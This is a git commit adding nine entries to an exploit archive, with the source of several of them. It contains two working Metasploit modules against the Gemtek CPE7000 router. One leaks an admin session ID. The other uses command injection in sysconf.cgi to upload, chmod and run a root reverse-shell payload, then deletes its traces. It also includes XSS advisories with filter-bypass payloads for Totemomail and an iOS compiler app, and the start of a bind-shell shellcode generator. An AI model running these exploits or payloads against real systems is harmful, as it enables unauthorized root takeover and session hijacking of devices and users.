DB: 2016-04-26
9 new exploits Totemomail 4.x and 5.x - Persistent XSS C/C++ Offline Compiler and C For OS - Persistent XSS Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF) CompuSource Systems - Real Time Home Banking - Local Privilege Escalation Linux x64 - Bind Shell Shellcode Generator PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF) NationBuilder Multiple Stored XSS Vulnerabilities Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC
This commit is contained in:
parent
22a4c5d4cc
commit
39fe341c5b
10 changed files with 1019 additions and 0 deletions
|
@ -35936,3 +35936,12 @@ id,file,description,date,author,platform,type,port
|
|||
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
|
||||
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
|
||||
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
|
||||
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
|
||||
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
|
||||
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
|
||||
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
|
||||
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
|
||||
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
69
platforms/hardware/webapps/39725.rb
Executable file
69
platforms/hardware/webapps/39725.rb
Executable file
|
@ -0,0 +1,69 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever',
|
||||
'Description' => %q{
|
||||
A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106 which allows
|
||||
unauthenticated remote attackers to retrieve a valid Administrative SID.
|
||||
|
||||
To obtain an administrative web session inject this SID in your client's
|
||||
cookie with values as follow: userlevel=2;sid=<SID>
|
||||
|
||||
Tested on Hardware version V02A and Firmware version 01.01.02.082.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39716' ],
|
||||
[ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ],
|
||||
[ 'URL' , 'http://www.gemtek.com.tw/' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Federico Scalco <fscalco [ at] mentat.is>'
|
||||
#Based on the exploit by Federico Ramondino <framondino [at ] mentat.is>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Apr 07 2016",
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 443
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new("TARGETURI", [true, 'The base URI to target application', '/']),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'login_confirm'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
|
||||
end
|
||||
|
||||
ssid = res.body.split(',', 2)
|
||||
print_good("#{@peer} - Valid root SID retrieved: #{ssid[1]}")
|
||||
end
|
||||
end
|
231
platforms/hardware/webapps/39726.rb
Executable file
231
platforms/hardware/webapps/39726.rb
Executable file
|
@ -0,0 +1,231 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106
|
||||
exposing Iperf tool to unauthenticated users. Injecting a
|
||||
command in the perf_measure_server_ip parameter, an attacker
|
||||
can execute arbitrary commands. Since the service runs as root,
|
||||
the remote command execution has the same administrative privileges.
|
||||
The remote shell is obtained uploading the payload and executing it.
|
||||
A reverse shell is preferred rather then a bind one, since firewall
|
||||
won't allow (by default) incoming connections.
|
||||
|
||||
Tested on Hardware version V02A and Firmware version 01.01.02.082.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Federico Scalco <fscalco [ at] mentat.is>'
|
||||
#Based on the exploit by Federico Ramondino <framondino [at ] mentat.is>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39716' ],
|
||||
[ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ],
|
||||
[ 'URL' , 'http://www.gemtek.com.tw/' ]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 07 2016',
|
||||
'Privileged' => false,
|
||||
'Platform' => %w{ linux },
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Linux arm Payload',
|
||||
{
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 443,
|
||||
'SHELL' => '/bin/sh'
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('CMD_DELAY', [false, 'Time that the Handler will wait for the incoming connection', 15]),
|
||||
OptInt.new('CHUNKS_DELAY', [false, 'Timeout between payload\'s chunks sending requests', 2]),
|
||||
OptString.new('UPFILE', [ false, 'Payload filename on target server, (default: random)' ]),
|
||||
OptInt.new('CHUNK_SIZE', [ false, 'Payload\'s chunk size (in bytes, default: 50)', 50 ]),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def request_resource(resname)
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => resname,
|
||||
'method' => 'GET',
|
||||
})
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{@rhost}:#{rport} - Failed to connect to the web server")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
print_status("#{@rhost}:#{rport} - Cleanup fase, trying to remove traces...")
|
||||
|
||||
begin
|
||||
clean_target(@upfile)
|
||||
rescue
|
||||
vprint_error("#{@rhost}:#{rport} - Failed to clean traces (/www/#{@upfile}). The resource must be removed manually")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
def clean_target(resname)
|
||||
res = request_resource(resname)
|
||||
if res and res.code != 404
|
||||
print_status("#{rhost}:#{rport} - Found resource " + resname + ". Cleaning up now")
|
||||
#remove
|
||||
cmd = '"; rm /www/' + resname +' &> /dev/null #'
|
||||
res = act(cmd, "deleting resource")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to delete resource /www/#{resname} (have to do it manually)")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def set_conditions(buffer)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'encode_params' => true,
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'save_iperf_value',
|
||||
'perf_measure_server_ip' => buffer,
|
||||
'perf_measure_server_port' => '5555',
|
||||
'perf_measure_cpe_port' => '5554',
|
||||
'perf_measure_test_time' => '60',
|
||||
'perf_measure_protocol_type' => '1',
|
||||
'perf_measure_packet_data_length' => '1024',
|
||||
'perf_measure_bandwidth' => '19m',
|
||||
'perf_measure_client_num' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way to set_condition request")
|
||||
end
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
def toggle_once
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'perf_measure_status_toggle'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way to toggle request")
|
||||
end
|
||||
|
||||
if res.body == "1"
|
||||
@retoggled = false
|
||||
return true
|
||||
elsif !@retoggled
|
||||
#print_status("#{@rhost}:#{rport} - First toggle request returned 0, retoggling now...")
|
||||
@retoggled = true
|
||||
toggle_once()
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "Toggler cgi did not respond in an expected way")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def act(buffer, step)
|
||||
set_conditions(buffer)
|
||||
res = toggle_once()
|
||||
return res
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
@retoggled = false;
|
||||
@cmd_delay = datastore['CMD_DELAY'] || 15
|
||||
@chunk_size = datastore['CHUNK_SIZE'] || 50
|
||||
@rhost = datastore['RHOST']
|
||||
@rport = datastore['RPORT']
|
||||
@upfile = datastore['UPFILE'] || rand_text_alpha(8+rand(8))
|
||||
chunk_delay = datastore['CHUNKS_DELAY'] || 2
|
||||
|
||||
clean_target(@upfile)
|
||||
|
||||
pl = payload.encoded_exe
|
||||
chunks = pl.scan(/.{1,#{@chunk_size}}/)
|
||||
hash = Hash[chunks.map.with_index.to_a]
|
||||
|
||||
print_status("Total payload chunks: " + chunks.length.to_s )
|
||||
print_status("#{rhost}:#{rport} - Uploading chunked payload on the gemtek device (/www/#{@upfile})")
|
||||
|
||||
for chk in chunks
|
||||
chind = hash[chk]
|
||||
safe_buffer = chk.each_byte.map { |b| '\x' + b.to_s(16) }.join
|
||||
|
||||
if chind == 0
|
||||
s_redir = '>'
|
||||
else
|
||||
s_redir = '>>'
|
||||
end
|
||||
|
||||
cmd = '"; printf \'' + safe_buffer + '\' ' + s_redir + ' /www/' + @upfile + ' #'
|
||||
|
||||
print_status("#{@rhost}:#{rport} - Uploading chunk " + (chind + 1).to_s + "/" + chunks.length.to_s + ('.' * (chind + 1)))
|
||||
res = act(cmd, "uploading shell")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
||||
end
|
||||
select(nil, nil, nil, chunk_delay)
|
||||
end
|
||||
|
||||
#chmod request
|
||||
cmd = '"; chmod 777 /www/' + @upfile + ' & #'
|
||||
print_status("#{rhost}:#{rport} - Asking the gemtek device to chmod #{@upfile}")
|
||||
res = act(cmd, "chmodding payload")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to chmod payload")
|
||||
end
|
||||
|
||||
select(nil, nil, nil, @cmd_delay)
|
||||
|
||||
#phone home
|
||||
cmd = '"; /www/' + @upfile + ' & #'
|
||||
print_status("#{rhost}:#{rport} - Asking the gemtek device to execute #{@upfile}")
|
||||
res = act(cmd, "executing payload")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
select(nil, nil, nil, @cmd_delay)
|
||||
|
||||
end
|
||||
end
|
169
platforms/ios/webapps/39721.txt
Executable file
169
platforms/ios/webapps/39721.txt
Executable file
|
@ -0,0 +1,169 @@
|
|||
Document Title:
|
||||
===============
|
||||
C & C++ for OS - Filter Bypass & Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1825
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-04-14
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1825
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.5
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This is an ios c app,you can learn,run,share c code. The software is a offline compiler for developers with apple iOS.
|
||||
Code templates,the contents of the new file is copy from contents of the template file.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/c-for-os-programming-language/id1016290003 )
|
||||
|
||||
|
||||
This is an ios c/c++ app,you can learn,run,share c/c++ code. In(the built-in browser or the txt editor),Select the text to run.
|
||||
Code templates,the contents of the new file is copy from contents of the template file.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/c-c++-offline-compiler-for/id1016322367 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered an application-side validation vulnerability in the official C & C++ for OS web-application (api).
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-04-14: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
XiaoWen Huang
|
||||
Product: C for OS & C++ - Mobile API (Web-Application) 1.2
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation and mail encode web vulnerability has been discovered in the official C & C++ for OS web-application (api).
|
||||
The persistent web vulnerability allows an attacker to inject malicious script codes on the application-side of the vulnerable modules context.
|
||||
|
||||
The basic validation of the code formular and mask allows to include any type of script codes or programming language without offensive input
|
||||
restrictions. Attackers can inject code to a project to share it with another source. In the moment the code of the project is generated to as
|
||||
email body, a persistent script code execution occurs.
|
||||
|
||||
There are two options to exploit, first is to send the malicious mail to the author of the program by the `Mail Author` function. Another possibility
|
||||
to execute code in the email body context is to share it with another code editor by email. In both email body message context the injected wrong
|
||||
filtered script code execution occurs. The internal encoding of the formular is correctly done but in case of sharing by qr or via message body email
|
||||
the execution occurs. The vulnerability is located on the application-side of the iOS application and the request method to inject requires physical
|
||||
device access or access to the share function. The bug is present in the C & C++ for OS 1.2 version of the mobile client. Attackers can for example
|
||||
generate a QR code with malicious context that is executed in the message body were the code is mainly displayed by the iOS application.
|
||||
|
||||
The security risk of the application-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
|
||||
Exploitation of the persistent vulnerability requires a low privileged ios device user account with restricted access and low user interaction.
|
||||
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious
|
||||
sources and application-side manipulation of affected or connected module context.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Share to Authors
|
||||
[+] Share by Email
|
||||
[+] Share via QR Code
|
||||
|
||||
Vulnerable Function(s):
|
||||
[+] Console
|
||||
[+] C or C++
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent vulnerability and mail encoding bug can be exploited by remote attackers with low privileged device user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Install the perl app to your apple iOS device
|
||||
2. Start the mobile application
|
||||
3. Include to the first variable in the demo code java or html script code and save the entry as c or c++ script
|
||||
4. Open the saved entry again and click the top right arrow menu
|
||||
5. Now choose Create QR or Share menu button
|
||||
6. Open the menu `Mail to Author` or push the default `iOS Mail App` button
|
||||
7. Now the code of the formular gets transfered to the email message body context
|
||||
Note: The encoding does not parse or encode any inserted values
|
||||
8. The email arrives to the target inbox
|
||||
9. Open the email and the code executes directly in the message body or next to the generated qr code
|
||||
10. Successful reproduce of the filter and validation vulnerability in the c and c++ app api!
|
||||
|
||||
Note: The bug can be exploited by sending to the author, by sending to another target mail or by transfer of a qr code.
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse and encode of the vulnerable message body context.
|
||||
Filter and parse all code values that are included to the message body. Configure the code to plain text not html to prevent
|
||||
further persistent injection attacks. In case of emergency use the escape function to separate the mechanism permanently.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the application-side mail encode web vulnerability in the mobile application api is estimated as medium. (CVSS 3.5)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
|
||||
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
|
||||
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
|
||||
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
|
||||
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
|
||||
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
|
||||
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
179
platforms/jsp/webapps/39720.txt
Executable file
179
platforms/jsp/webapps/39720.txt
Executable file
|
@ -0,0 +1,179 @@
|
|||
Document Title:
|
||||
===============
|
||||
Totemomail v4.x & v5.x - Filter Bypass & Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1769
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-04-08
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1769
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.8
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
totemomail® Encryption Gateway protects your email communication with customers and business partners whereas
|
||||
totemomail Internal Encryption secures your internal email traffic. In combination, they become the innovative and potent
|
||||
hybrid encryption solution totemomail Hybrid Encryption. totemomail Encryption Gateway features a high level of security and
|
||||
it is easy for end users and administrators alike to use. The everyday user will have no need to think about encryption because
|
||||
the software is based on a high level of automation.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.totemo.com/products/mail/overview/introduction/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Core Research Team discovered an application-side vulnerability and a
|
||||
filter bypass issue in the Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-02-26: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
|
||||
2016-02-27: Vendor Notification (Totemomail Security Team)
|
||||
2016-02-30: Vendor Response/Feedback (TotemomailSecurity Team)
|
||||
2016-03-11: Vendor Fix/Patch (Totemomail Developer Team)
|
||||
2016-04-13: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability and a filter bypass issue has been discovered in the official Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
|
||||
The filter bypass issue allows an attacker to evade the controls of a protection or restriction mechanism to compromise further web module context or service functions.
|
||||
The persistent validation vulnerability allows an attacker to inject own malicious script codes on the application-side of the vulnerable web-application module context.
|
||||
|
||||
The persistent input validation web vulnerability has been discovered in the `Betreff(Subject)` and `Message (Body)` input fields of the `Neue Nachricht (New Message)` module.
|
||||
The attacker can inject malicious script codes to the message body or subject input field. After the inject of the non exectuable context is get send to another manager by
|
||||
secure mail interaction. After the arrival of the message the receiver clicks to `save as html`. In the moment the encoded mail context is generated as html, the malicious
|
||||
injected tag is getting visible as executable context. The injection point of the vulnerability are the `subject` and `message body` input fields and the execution point
|
||||
occurs in the moment the target manager generated the message as html to review or print.
|
||||
|
||||
The regular filter mechanism and validation does not allow to inject for example iframes and basic script code tags like script, iframe, div to the web input forms. As far as
|
||||
an payload is included to for example the subject as listing the validation parses and encodes the string and show only the first two characters. We figured out that is possible
|
||||
to bypass by usage of `img` script code tags with onload alert. The encoding of the input needs to be restricted permanently against special char inputs, the validation procedure
|
||||
needs to parse and encode the input without extending the entry with a null location entry.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Posteingang - Nachricht
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Subject (Betreff)
|
||||
[+] Message Body (Nachricht)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Message Index (main.jsp)
|
||||
[+] Save as Html (Als HTML Speichern)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
1.1
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Open a new message
|
||||
2. Include any random demo text first
|
||||
3. Include now at least in the message body the script code payloads
|
||||
4. Scroll above back to the subject and include the same payload to the subject input field
|
||||
5. Save the entry as draft
|
||||
6. You can now already see that the service attached to the script code another alt value
|
||||
Note: "><img src="x" alt="null"> "><"<img src="x" alt="null">%20%20> ...
|
||||
7. Now you send the message directly to a manager for reply
|
||||
8. The manager received the message and treid to review it as html
|
||||
9. The execution occurs in the subject and the message body of the html file
|
||||
Note: The html file is wrong encoded and does not parse the values again next to generating the html source file
|
||||
10. Successful reproduce of the filter bypass issue and persistent vulnerability!
|
||||
|
||||
|
||||
PoC: Filter Bypass
|
||||
"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
|
||||
"><img src=x onerror=prompt(23);>
|
||||
>"<<img src="c" onerror=alert(1)>
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure filter and parse of img onload alert script code tags that actually can bypass the filter validation of the Betreff input fields.
|
||||
After that encode and parse the print function that stream the context in html format were the execution point occurs finally.
|
||||
Restrict the input finally and disallow usage of special chars in the subject input field to prevent persistent script code injection attacks.
|
||||
In the second step a secure validation of the pgp key filename (email|preeshare) and input is required to secure encode the vulnerable email and name value of the certificate file.
|
||||
Re-encode the editor text values to no get obviously broken format context back like demonstrated in the picture.
|
||||
|
||||
Fix (temp): Do not open email via save as function in html to prevent exploitation of the issue.
|
||||
|
||||
Totemo AG: The vulnerability is already patched in the newst version of the appliance web-application to protect customers.
|
||||
The update can be processed automatically or by manual interaction with the web-service.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the filter bypass issue and application-side input validation encoding vulnerability in the totemomail Hybrid Encryption appliance web-application.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
|
||||
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
|
||||
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
|
||||
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
|
||||
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
|
||||
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
|
||||
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
100
platforms/lin_x86-64/shellcode/39728.py
Executable file
100
platforms/lin_x86-64/shellcode/39728.py
Executable file
|
@ -0,0 +1,100 @@
|
|||
#!/bin/python
|
||||
import socket
|
||||
import sys
|
||||
"""
|
||||
|
||||
Linux x64 - Bind Shell shellcode Generator
|
||||
|
||||
---------------------------------------------------------------------------------
|
||||
|
||||
Disassemby of bindshell - port 5600
|
||||
|
||||
Disassembly of section .text:0000000000400080 <.text>:
|
||||
400080: 48 31 c0 xor %rax,%rax
|
||||
400083: 48 31 f6 xor %rsi,%rsi
|
||||
400086: 99 cltd
|
||||
400087: 6a 29 pushq $0x29
|
||||
400089: 58 pop %rax
|
||||
40008a: ff c6 inc %esi
|
||||
40008c: 6a 02 pushq $0x2
|
||||
40008e: 5f pop %rdi
|
||||
40008f: 0f 05 syscall
|
||||
400091: 48 97 xchg %rax,%rdi
|
||||
400093: 6a 02 pushq $0x2
|
||||
